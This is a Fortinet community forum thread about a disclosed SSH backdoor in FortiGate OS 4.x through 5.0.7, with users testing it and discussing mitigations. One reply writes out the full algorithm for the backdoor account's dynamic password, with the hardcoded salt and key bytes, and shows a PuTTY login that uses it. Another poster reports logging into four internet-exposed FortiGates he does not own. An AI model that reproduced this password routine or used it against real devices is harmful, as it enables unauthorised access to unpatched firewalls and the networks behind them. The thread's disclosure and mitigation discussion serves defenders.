Fortinet Forum
The Forums are a place to find answers on a range of Fortinet products from peers and product experts.
MikeU
New Contributor

SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7

SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7

http://seclists.org/fulldisclosure/2016/Jan/26

 

I have not had a chance to try this. I don't see any threads discussing it. So, I thought I'd share.

 

=Mike
25 REPLIES 25
deepakmime
New Contributor

is there any comments from Fortinet Technical team on it. very keen to know

 

the guy here in twitters confirms that he has the backdoor working

 

https://twitter.com/esizkur

 

 

 

djwilliams

I have tried the script out there and have not been able to get it to work.  Until we get some answer from Fortinet I'm going to keep at it.

Network Engineer
Stan

Tried it on a 5.0.7 version and it works.

The script logs in without any password prompt

neonbit
Valued Contributor

Confirming the script works. I just tested on a fresh FGVM running 5.0.6 and it logs automatically...

 

~/Desktop $ ./fgt_ssh_backdoor.py 192.168.100.200 FortiGate-VM64 # get sys status Version: FortiGate-VM64 v5.0,build0271,140124 (GA Patch 6) Virus-DB: 16.00560(2012-10-19 08:31) Extended DB: 1.00000(2012-10-17 15:46) IPS-DB: 4.00345(2013-05-23 00:39) IPS-ETDB: 0.00000(2001-01-01 00:00) Serial-Number: FGVMEV0000000000

neonbit
Valued Contributor

I just did a quick search for FortiGates online running SSH and after 10 minutes was able to connect to 4... this is going to hurt some people methinks...

 

I noticed that there is no log saved for the actual SSH connection from the script. The only time I was able to see a log entry was when I changed the config (user: Fortimanager_Access).

localhost

Thanks for sharing Mike.

 

I've got mixed result. This one works:

Version: FortiGate-VM64 v5.0,build0128,121101 (GA)

 

But I was unable to access my FG-111C:

Fortigate-111C v4.0,build0639,120906 (MR3 Patch 10)

 

Don't know.. maybe it's because I did a downgrade from 5.2. Or they have different salts.

 

For those who don't want to dig too deep into this.

 

This is all the magic:

 

If you connect to SSH with the user 'Fortimanager_Access' you'll receive a challenge.

Then you can calculate the dynamic password based on this dword challenge:

 

n = $SSH_Challenge
m = $SHA1_Generator

 

m.add('\x00' * 12)
m.add(n + 'FGTAbc11*xy+Qqz27')
m.add('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
$Dynamic_Password = 'AK1' + base64.b64encode('\x00' * 12 + m.sha1digest())

 

 

Putty:

login as: Fortimanager_Access

 

Using keyboard-interactive authentication. -840056459

 

Access denied

 

Using keyboard-interactive authentication. -1914958026

 

Access denied

 

Using keyboard-interactive authentication. -1378285763

 

AK1AAAAAAAAAAAAAAAAmWT0TKGMI23Iq4Q9P42z0PwpYBQ=

 

FortiGate-VM64 #

 

 

This only works, if you have a SSH access. So by limiting the ip ranges for all admin users, you can mitigate the threat.

emnoc
Esteemed Contributor III

If you enable a ssh key it seems like it results in a fix . Can anybody confirm this on there FGT? ( upload a ssh key  from the CLI and retest )

 

PCNSE 

NSE 

StrongSwan  

localhost

Like this?

 

login as: admin Authenticating with public key "rsa-key-20160113"

FortiGate-VM64 # conf sys admin

FortiGate-VM64 (admin) # show

config system admin

  edit "admin"

     set accprofile "super_admin"

     set vdom "root"

     set ssh-public-key1 "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArnvrfeRc/Dp29mYq6Yp4YqHSYzvdsGiwvt5I+5PiQKACosqED4L6OApvXBtEsJz7XMJct9cADHxgajn2UrxDUxgjec3/4NVYkq9/jHm1X0y5MbgLb5X2ftDQNqM3gzO2vk6ZRCN9kyq4oCs0V2ynZYnjp8Q8/pRYAm/Y4DhE8s+SZKhDHNq6R3q4wc9IPWgAiWSGCsaPPGH2+3cYlvwQRDyva5RsWZPz4WhLm33A+/rl+4CBXY70mlPuXN3xvps                                                                                                           9IGTb0yYA0H03tfGbKxaQdEArFe4nh30b8gTZALtWJ3lNE1Y8oq3zVYrnfDIzmtNsCY/NnaSKi9bQMH0TcRjEUQ== rsa-key-20160113"

     config dashboard-tabs

        <snip>

     end

     config dashboard

        <snip>

     end

     set password ENC AK1nds6rsH4pi3VuVI9jjtvaXR1fZjp5v8Stds1F03wrqA=

  next

end

FortiGate-VM64 (admin) #

 

Still able to access with the FortiManager user.